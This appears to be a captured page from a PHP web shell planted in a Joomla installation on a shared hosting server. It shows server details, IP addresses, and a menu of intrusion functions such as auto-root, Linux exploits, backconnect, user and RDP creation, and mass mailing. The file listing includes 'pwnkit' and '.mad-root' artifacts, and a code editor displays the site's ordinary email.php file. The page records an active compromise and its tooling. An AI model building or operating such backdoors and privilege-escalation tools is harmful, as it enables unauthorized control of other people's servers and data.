Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
cms /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
language
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
access.php
8.56
KB
-rw-r--r--
actionsdropdown.php
5.59
KB
-rw-r--r--
batch.php
5.77
KB
-rw-r--r--
behavior.php
26.19
KB
-rw-r--r--
bootstrap.php
30.89
KB
-rw-r--r--
category.php
4.43
KB
-rw-r--r--
content.php
1.12
KB
-rw-r--r--
contentlanguage.php
1.53
KB
-rw-r--r--
date.php
1.93
KB
-rw-r--r--
dropdown.php
8.79
KB
-rw-r--r--
email.php
3.32
KB
-rw-r--r--
form.php
736
B
-rw-r--r--
formbehavior.php
4.41
KB
-rw-r--r--
grid.php
9.85
KB
-rw-r--r--
html.php
31.3
KB
-rw-r--r--
icons.php
1.52
KB
-rw-r--r--
jgrid.php
16.15
KB
-rw-r--r--
jquery.php
2.95
KB
-rw-r--r--
links.php
2.51
KB
-rw-r--r--
list.php
6.65
KB
-rw-r--r--
menu.php
8.11
KB
-rw-r--r--
number.php
1.52
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rules.php
7.89
KB
-rw-r--r--
searchtools.php
4.09
KB
-rw-r--r--
select.php
27.35
KB
-rw-r--r--
sidebar.php
3.14
KB
-rw-r--r--
sliders.php
3.83
KB
-rw-r--r--
sortablelist.php
3.16
KB
-rw-r--r--
string.php
8.93
KB
-rw-r--r--
tabs.php
2.63
KB
-rw-r--r--
tag.php
6.72
KB
-rw-r--r--
tel.php
2.15
KB
-rw-r--r--
user.php
1.95
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : email.php
<?php /** * @package Joomla.Libraries * @subpackage HTML * * @copyright Copyright (C) 2005 - 2015 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ defined('JPATH_PLATFORM') or die; /** * Utility class for cloaking email addresses * * @since 1.5 */ abstract class JHtmlEmail { /** * Simple JavaScript email cloaker * * By default replaces an email with a mailto link with email cloaked * * @param string $mail The -mail address to cloak. * @param boolean $mailto True if text and mailing address differ * @param string $text Text for the link * @param boolean $email True if text is an e-mail address * * @return string The cloaked email. * * @since 1.5 */ public static function cloak($mail, $mailto = true, $text = '', $email = true) { // Convert mail $mail = static::convertEncoding($mail); // Split email by @ symbol $mail = explode('@', $mail); $mail_parts = explode('.', $mail[1]); // Random number $rand = rand(1, 100000); $replacement = '<span id="cloak' . $rand . '">' . JText::_('JLIB_HTML_CLOAKING') . '</span>' . "<script type='text/javascript'>"; $replacement .= "\n //<!--"; $replacement .= "\n document.getElementById('cloak$rand').innerHTML = '';"; $replacement .= "\n var prefix = 'ma' + 'il' + 'to';"; $replacement .= "\n var path = 'hr' + 'ef' + '=';"; $replacement .= "\n var addy" . $rand . " = '" . @$mail[0] . "' + '@';"; $replacement .= "\n addy" . $rand . " = addy" . $rand . " + '" . implode("' + '.' + '", $mail_parts) . "';"; if ($mailto) { // Special handling when mail text is different from mail address if ($text) { // Convert text - here is the right place $text = static::convertEncoding($text); if ($email) { // Split email by @ symbol $text = explode('@', $text); $text_parts = explode('.', $text[1]); $replacement .= "\n var addy_text" . $rand . " = '" . @$text[0] . "' + '@' + '" . implode("' + '.' + '", @$text_parts) . "';"; } else { $replacement .= "\n var addy_text" . $rand . " = '" . $text . "';"; } $replacement .= "\n document.getElementById('cloak$rand').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy" . $rand . " + '\'>'+addy_text" . $rand . "+'<\/a>';"; } else { $replacement .= "\n document.getElementById('cloak$rand').innerHTML += '<a ' + path + '\'' + prefix + ':' + addy" . $rand . " + '\'>' +addy" . $rand . "+'<\/a>';"; } } else { $replacement .= "\n document.getElementById('cloak$rand').innerHTML += addy" . $rand . ";"; } $replacement .= "\n //-->"; $replacement .= "\n </script>"; return $replacement; } /** * Convert encoded text * * @param string $text Text to convert * * @return string The converted text. * * @since 1.5 */ protected static function convertEncoding($text) { $text = html_entity_decode($text); // Replace vowels with character encoding $text = str_replace('a', 'a', $text); $text = str_replace('e', 'e', $text); $text = str_replace('i', 'i', $text); $text = str_replace('o', 'o', $text); $text = str_replace('u', 'u', $text); $text = htmlentities($text, ENT_QUOTES, 'UTF-8', false); return $text; } }
Close